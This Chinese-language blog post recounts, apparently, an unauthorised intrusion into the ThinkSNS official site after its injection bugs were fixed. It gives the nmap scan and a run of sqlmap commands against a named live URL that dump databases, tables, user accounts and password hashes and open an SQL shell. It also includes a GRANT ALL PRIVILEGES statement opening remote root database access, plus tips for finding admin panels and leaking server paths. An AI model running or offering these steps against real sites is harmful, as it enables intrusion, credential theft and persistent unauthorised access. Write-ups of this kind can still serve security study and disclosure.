渗透thinksns官网
(本文涉及的所有漏洞已经被修复!)
(由于文章是后来补写的,有些图可能无法抓到。sorry)
ThinkSNS(简称TS),开源微博引擎。
一直都在看thinksns的代码,但是由于很彩笔,一直没找到什么实质的漏洞,
某天在90sec上,看到某黑阔发的thinksns注入0day,看了下,是一个插件的注入,注入点:index.php?app=blog& mod=Index&act=show&id=2211,惭愧啊,差距啊,羞愤难平的我心中冒出了邪恶的想法。。。。。
——————–分割线————————
0x01 Nmap照亮前方的路
nmap -sS -sU -T4 -A -v thinksns.com
我最喜欢的一个配置,速度也不错,
linux服务器,apache
哈哈,lamp配置
果断看到一个3306
嘎嘎,本地的mysql
然后,就没收集到什么了。。。。。
0x02 Sqlmap凸显神威
http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211
拿到注入点,为了抓紧时间,和管理员赛跑,直接上sqlmap!
# sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211
回显了数据库版本,5.x的
很好,可以注入!
# sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211 –dbs
列出了所有库
oh,great!
一个t_thinksns
一个thinksns
一个wp的blog的库
还有几个小库
于是想直接注入t_thinksns这个库
# sqlmap.py -u http://t.thinksns.com/index.php? app=blog&mod=Index&act=show&id=2211 –tables -D t_thinksns
然后一步步爆密码
其实我个人感觉如果只是注入的话,union select肯定更快,但是我电脑装的ubuntu,是没有小葵那个转码工具的,虽然可以用burp suite的 编码转换,但是,不喜欢用
搞到密码。开始跑。。。。。
忽然发现哥又二逼了,这种站,找不到后台的吧。。。
翻了好多页都没看到后台
这里在啰嗦下,其实也可以用so.360.cn 这个二货引擎抓取了好多大站后台,无视robots
然后
sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211 –users
我其实比较性急,所以直接注入,看能不能得到,我一般都不看注入权的
激动了,竟然得到了几个用户 root t_thinsns(应该就是这个注入的用户)还有几个不记得了
sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211 –passwords
sqlmap.py -u http://t.thinksns.com/index.php?app=blog&mod=Index&act=show&id=2211 –sql-shell
system vi /etctpd/conftpd.conf;
GRANT ALL PRIVILEGES ON . TO ‘root’@’%’ IDENTIFIED BY ‘ts**00’ WITH GRANT OPTION;
果断换mysql
读出来了
这一段是在战虎基友帮助下完成的,我的mysql似乎sb了
忽然想到旁注上面还有好多站,有个blog,一下子又激动了!!
更NB的是用谷歌浏览器 直接访问加入个linux.php 爆路径(战虎提供的思路)
发现密码很黑阔,
不过我们不怕,既然解密不出管理的密码,我们本地搭建wp-blog
wp的后台一般都比较弱智,后台拿shell更无聊,果断跳过!
这里,十分感谢战虎,他的经验和他的真诚真的让我很感动,有你相伴,渗透之路更加金彩!
编辑点评:整个渗透过程很详细,测试的过程很少是一帆风顺的,遇到困难的时候需要的就是耐心和细心了!
渗透thinksns官网相关推荐
- ICS—CERT官网公示匡恩网络新发现四工控漏洞
近日,美国ICS-CERT官网相继公布了由匡恩网络智能安全工业研究院发掘的四个中高危漏洞和漏洞利用验证.匡恩网络率先预警了黑客利用这些漏洞实施网络攻击的风险,从多层面.多维度为工控安全"上保 ...
- 网络安全与渗透:内网渗透,Cobalt_Strike(十三)此生无悔入华夏,男儿何不带吴钩
中华人民共和国网络安全法 阅读本文前,请熟读并遵守中华人民共和国网络安全法: http://gkhy.jiujiang.gov.cn/zwgk_228/jc/zcwj/202006/P02020061 ...
- Python爬虫登录大学官网
Python爬虫登录大学官网 通过python登录大学官网(当然首先要有账号密码),内容包括:如何使用chrome查看网页信息和网络请求.分析网站通过js加密用户密码的方式.使用python登录网 ...
- (附源码)springboot中北创新创业官网 毕业设计 271443
Springboot中北创新创业官网 摘 要 进入21世纪以来,计算机有了迅速的发展.计算机应用.信息技术全面渗透到了人类社会的各个方面,信息化已成为世界经济和社会发展的大趋势.本文主要通过对中北创新 ...
- 千匠星云数字化解决方案介绍 | 品牌官网数字化升级解决方案
千匠网络以赋能企业数字化销售为使命,基于企业互联网中台架构实践及技术,助力企业线上数字化销售转型和商业创新.拥有多套成熟的零售.批发等业务模式线上销售解决方案及细分行业解决方案为企业提供支持,包含移动 ...
- 乐鑫esp8266学习rtos3.0笔记第6篇:esp8266-12模块基于rtos3.1版本ota功能远程空中升级固件,官网之上增加dns域名解析!(附带demo)
本系列博客学习由非官方人员 半颗心脏 潜心所力所写,仅仅做个人技术交流分享,不做任何商业用途.如有不对之处,请留言,本人及时更改. 1. Esp8266之 搭建开发环境,开始一个"hello ...
- 跟着官网学Python(8):输入输出
"Python输入.输出.文件读写以及异常知识." 01 面临问题 继续跟着官网学Python,第7章输入输出. 前面已经基本学完Python的语法部分,也学会如何使用轮子,但是编 ...
- bcache状态和配置文件详细介绍(翻译自官网)
参考文献 http://www.cnblogs.com/zimufeng/p/6640439.html 有参考价值 https://www.kernel.org/doc/Documentation/b ...
- 微软在.NET官网上线.NET 架构指南频道
微软在Visual Studio 2017 正式发布的时候也上线了一个参考应用https://github.com/dotnet/eShopOnContainers , 最近微软给这个参考应用写了完善 ...
最新文章
- 独家 | 教你使用简单神经网络和LSTM进行时间序列预测(附代码)
- linux定时备份mysql_linux定时备份MySQL数据库并删除七天前的备份文件
- 1.4 Float类
- CVer入门必备:计算机视觉的深度学习实践
- id文件夹怎样传入服务器,服务器id怎么设置
- 我的新书《PWA入门与实践》上市了
- 【LightOJ - 1027】A Dangerous Maze(概率dp,数学期望)
- PostgreSQL 自定义复合类型(composite type) deform引入的额外开销
- C#多线程学习1——多线程的相关概念
- cat依赖的org.unidal.maven.plugins:plexus-maven-plugin:pom:2.1.2
- AtCoder Regular Contest 102 (ARC102) E - Stop. Otherwise... 排列组合
- 卓有成效的管理者——彼得·德鲁克
- 【汇编语言实验一】用机器指令和汇编指令编程(1)
- QEMU imx6ul开发板环境搭建
- 穷和尚与富和尚的故事
- SpringBoot JPA多对一 持久化是报错object references an unsaved transient instance - save the transient instanc
- 在Mac系统环境下如何制作win 10 启动盘
- 名词性从句 - 同位语从句
- 培训机构出来的程序员目前的就业前景怎么样?
- 构建chinaskillmall-nginx镜像